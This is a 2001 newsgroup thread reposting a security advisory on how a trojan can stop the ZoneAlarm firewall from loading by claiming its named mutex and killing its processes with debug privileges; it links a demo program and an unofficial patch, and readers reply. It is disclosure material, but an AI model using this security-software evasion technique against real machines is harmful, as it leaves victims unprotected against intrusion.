[NEWS] Trojans can block ZoneAlarm by setting a Mutex in memory

2 views
Skip to first unread message

Cybernetics

unread,
Jan 13, 2001, 9:34:33 AM1/13/01
to
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


Trojans can block ZoneAlarm by setting a Mutex in memory
------------------------------------------------------------------------


SUMMARY

ZoneAlarm and ZoneAlarm Pro can be stopped from loading by creating a
memory-resident Mutex (using a call to the CreateMutex API).
Uninstalling\reinstalling ZoneAlarm in a different path has no effect.
The impact of this vulnerability is that a Trojan running on a victim's
machine can prevent ZoneAlarm from loading, and thus leave the victim open
for attack.

DETAILS

Vulnerable systems:
All known versions of ZoneAlarm

<http://www.zonelabs.com> Zone Labs "ZoneAlarm" and "ZoneAlarm Pro"
programs both use a Mutex - an event synchronization memory object - to
determine if it has already loaded (to prevent loading a second instance
of the firewall).

By design, ZoneAlarm\ZoneAlarm Pro has no way of determining which program
actually set the Mutex, thus allowing a Trojan to use the Mutex and block
both ZoneAlarm and ZoneAlarm Pro from loading.

Exploit:
A Trojan can easily set this Mutex ("Zone Alarm Mutex") with one simple
call to the CreateMutex API (see <http://msdn.microsoft.com>
msdn.microsoft.com for more information on Mutexes). ZoneAlarm and
ZoneAlarm Pro are then prevented from loading as long as the Trojan is
alive. If ZoneAlarm is running, all the Trojan has to do is terminate the
processes of zonealarm.exe, vsmon.exe and minilog.exe first before
creating the Mutex. Despite being services, vsmon.exe and minilog.exe can
both be killed by any program by setting its local process token
privileges to SeDebugPrivilege, giving it the power to kill any
process/service.

Demonstration:
A harmless, simple, working executable to demonstrate the vulnerability,
is available at:
<http://www.diamondcs.com.au/alerts/zonemutx.exe>
http://www.diamondcs.com.au/alerts/zonemutx.exe (16kb).
While the demo program is running, you will not be able to load ZoneAlarm
or ZoneAlarm Pro, and if it finds that ZoneAlarm\ZoneAlarm Pro is running,
it will terminate the ZoneAlarm processes and services first using
SeDebugPrivilege before stealing the ZoneAlarm Mutex. The demo also opens
an echo server socket to listen on TCP 7, allowing you to test socket
connectivity/data transfer (try telnetting to 127.0.0.1 on port 7 and
saying hello).

Workaround:
Apply the following unofficial patch:
<http://www.diamondcs.com.au/alerts/zamutex.exe>
http://www.diamondcs.com.au/alerts/zamutex.exe.
Note: This patch is not an official patch from Zone Labs.

This patch re-hashes the Zone Alarm Mutex in both ZoneAlarm and ZoneAlarm
Pro. It is a temporary "band-aid" patch, and as such it is not bulletproof
and it is possible that it could be undone. However, it still greatly
improves the local security of ZoneAlarm regarding this situation - its
Mutex (as demonstrated by zonemutx.exe) can no longer be conventionally
hijacked. Zone Labs can only implement the real solution to this problem.

To apply the patch:
Download and run zamutex.exe (and needless to say, make sure you properly
shut down ZoneAlarm before running the patch) - it will ask you where the
ZoneAlarm.exe/ZAPro.exe file you want to patch is located. Select the
file, press OK and the program will do the rest by safely patching that
file and its accompanying zoneband.dll file.

As with all patches, it is recommended that you make a backup of the files
(zoneband.dll and zonealarm.exe/zapro.exe) before applying the patch.


ADDITIONAL INFORMATION

The information has been provided by <mailto:wa...@DIAMONDCS.COM.AU>
Wayne of DiamondCS.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
In order to subscribe to the mailing list, simply forward this email to:
list-su...@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

--

Regards,
Cybernetics

Happy New Year.


gizmo

unread,
Jan 13, 2001, 2:32:39 PM1/13/01
to
I'm under the impression that ZA runs as a service, so the trojan
would also have to run as a service and additionally it would have to
start prior to ZA, is that correct?

KiwiBacon

unread,
Jan 15, 2001, 11:25:14 PM1/15/01
to
The main point is that you need to be infected 1st. And if you are, then
why not destroy zone.exe instead...lol.

And as far as infection goes, it's nothing a good AV or AT can't sort
out.

--
"For Every Possible Action There's An Opposite An Equal Reaction"

Reply all
Reply to author
Forward
0 new messages